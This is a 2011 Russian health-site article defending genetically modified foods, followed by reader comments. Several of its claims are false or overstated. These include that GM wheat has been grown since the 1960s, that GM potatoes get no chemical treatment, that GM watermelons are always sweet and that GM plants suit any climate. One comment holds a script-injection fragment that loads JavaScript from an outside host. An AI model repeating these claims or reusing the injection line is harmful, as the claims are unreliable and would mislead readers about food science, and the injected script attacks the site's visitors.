Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Опасны ли генетически мод...  >>  Опасны ли генетически модифицированные продукты?
 
Обратная связь
 

Опасны ли генетически модифицированные продукты?

Размер шрифта
02 февраля 2011 00:01
  • google_analytics: false
  • Нравится

Половина продуктов на прилавках магазинов украшены надписью: «Без ГМО» или «Не содержит ГМО». Но что означает эта аббревиатура? Что мы знаем о ГМО?

Елена Орлова / «Здоровье-инфо»

Три буквы, три буквы…

ГМО – это генетически модифицированный организм. Другими словами, это организм, в ДНК которого искусственным путем введен ген (или даже несколько генов) от организма другого вида или класса для придания ему новых свойств. Результат такого генного скрещивания еще называют трансгенным организмом, или попросту – трансген. Для чего люди делают это? Зачем нарушают волю матушки-природы, которая уже создала генетический «портрет» каждого живого существа на планете? Какими такими особенными свойствами ученые хотят наделить уже существующие растения и для чего?

Да, в общем-то, для нашей с вами пользы. Вот несколько конкретных примеров.

  • Ген скорпиона, внедренный в генетическую структуру картофеля, защищает корнеплод от колорадского жука, а ген бактерии «тюрингская палочка» – от всех известных на сегодня вредителей.
  • Ген глубоководной камбалы, встроенный в структуру томата, кукурузы и соевых бобов дает сорта холодоустойчивых растений, которые можно выращивать даже на Крайнем Севере.
  • Ген печени человека, встроенный в генную структуру риса и сахарной свеклы, делает эти растения устойчивыми к пестицидам, применяемым для уничтожения различных вредителей.

Встроить чужеродный ген в генетическую структуру организма довольно сложно, ведь при этом нужно не повредить весь генотип растения. Вроде бы, все действия генетиков-селекционеров оправданны и результаты должны нас радовать – ведь мы получаем продукты более высокого качества. Почему же большинство современных людей считают, что продукты, содержащие ГМО, опасны для здоровья? При этом объяснить, в чем именно состоит угроза, толком никто не может.

Бойся неизвестного?

Все дело в том, что ГМО пока еще слишком молоды, чтобы человечество могло в них поверить и раз и навсегда убедиться, что никакого вреда от них нет, что «вмешательство человека в природу» немногим отличается от естественных изменений генетической структуры растений, происходящих в результате естественного или искусственного отбора (селекции). Даже в рядах ученых пока еще не сформировалось единого мнения по поводу ГМО: одни пугают нас «отдаленными последствиями», другие убеждают, что ничего страшного не случится, и все эти мнения многократно повторяются и, к сожалению, часто искажаются СМИ, которые в этой ситуации напоминают горное эхо – шуму много, а слов не разобрать. Беда и в том, что зачастую сторонники генной модификации не могут объяснить рядовому потребителю суть этого явления, ведь наши познания в генетике в лучшем случае ограничиваются уравнениями по Менделю, которые мы решали на уроках биологии: сколько пятнистых кроликов получится от скрещивания белого и серого.

К тому же сторонники ГМО опрометчиво заявили, что генетическая модификация значительно удешевит продукты, что поможет победить голод на планете. На нас хотят сэкономить! Разве можно поверить в искренние намерения ученых? Это международный заговор с целью истребить человечество, – примерно к такому выводу пришло массовое сознание, которое всегда менее умно, чем каждый человек в отдельности. И все массово начали бояться и избегать ГМО – на радость некоторым производителям и продавцам «натуральных» продуктов, которым теперь так легко убедить нас купить какую-либо продукцию: достаточно крупно написать на этикетке «Без ГМО!».

Не бойтесь!

Между тем мы ежедневно и довольно давно употребляем ГМО-продукты и даже не подозреваем об этом. Например, хлеб. Пшеница стала одним из первых объектов успешных экспериментов ученых-генетиков по борьбе с вредителями злаковых. С 60-х годов прошлого века (в нашей стране чуть позднее) человечество сеет и жнет модифицированные семена и собирает куда более обильный и безвредный урожай, чем в ту эпоху, когда над хлебными полями каждое лето работала авиация агрохимзащиты.

Реальные плюсы генной модификации продуктов

  • Генная модификация позволяет уменьшить обработку растений ядохимикатами или вовсе отказаться от нее. Например, модифицированный картофель вообще не подвергается никакой химобработке.
  • Повышается качество урожая, сохранность продуктов.
  • Генно-модифицированные продукты стоят дешевле, поскольку потери урожая и затраты на выращивание и обработку растений минимальны.
  • Овощи и фрукты могут приобретать не только особые свойства сопротивляемости вредителям, но и те вкусовые качества, которые «заказывает» потребитель. Например, генно-модифицированные арбузы всегда сладкие.
  • Растения с ГМО устойчивы к любому климату.
  • Кстати, на вкус отличить натуральные продукты от генно-модифицированных невозможно, поэтому не стоит, пробуя безвкусный огурец, причитать: «Ясно, это все генномодифицированное». Скорее всего, огурец просто вырос в теплице и не видел живой земли и ясного солнышка.

Пожалуй, будет полезно развеять еще и некоторые полумистические страхи человечества перед ГМО.

Вы должны это знать

  • Съев продукт с ГМО, человек не может потерять свою видовую устойчивость и начать превращаться, например, в скорпиона или камбалу. Никакие «чужеродные» гены в наш ДНК естественным путем встроиться не могут. В конце концов, все продукты, которые мы едим, содержат гены. Пища, попадая в желудочно-кишечный тракт, переваривается до элементарных частиц, которые либо всасываются, либо выводятся из организма. Ни один ген, каким бы модифицированным он ни был, не «застрянет» внутри вас и не начнет разрушительную деятельность по встраиванию в цепочку вашего ДНК.
  • Генно-модифицированные продукты не оказывают никакого особенного влияния на иммунитет человека. А вот натуральные продукты могут отрицательно сказаться на нем, так как проходят обработку ядохимикатами.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - ubratana

24 сентября 2013 в 00:41

Цитировать   |   Пожаловаться

А чего ж про минусы не написали? да и плюсы если честно уже не являются плюсами. это баки биотехнологов. А вот минусы уже есть, на эту тему есть хорошая статья

2 - zzzzzz

30 июня 2015 в 21:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

01 июля 2015 в 00:21

Комментарий удален за нарушение Правил общения

Статьи

       
Как утолить жажду и сохранить здоровье?   Это нужно съесть   Секреты приготовления овощей   Почему нужно сократить потребление сахара и как это сделать  
25 июля 2011От лишнего веса спасают наскучившие продукты 24 сентября 2010Найден самый полезный рис
 
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 07 января 2013ГМО-помидоры спасают от атеросклероза
 

Слайдшоу

1
Продукты для долгой жизни
Суперпродукты против усталости
Продукты, которые нас лечат. Часть 3

Тесты

1
Есть ли у вас избыточный вес?
Правильно ли вы худеете?
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.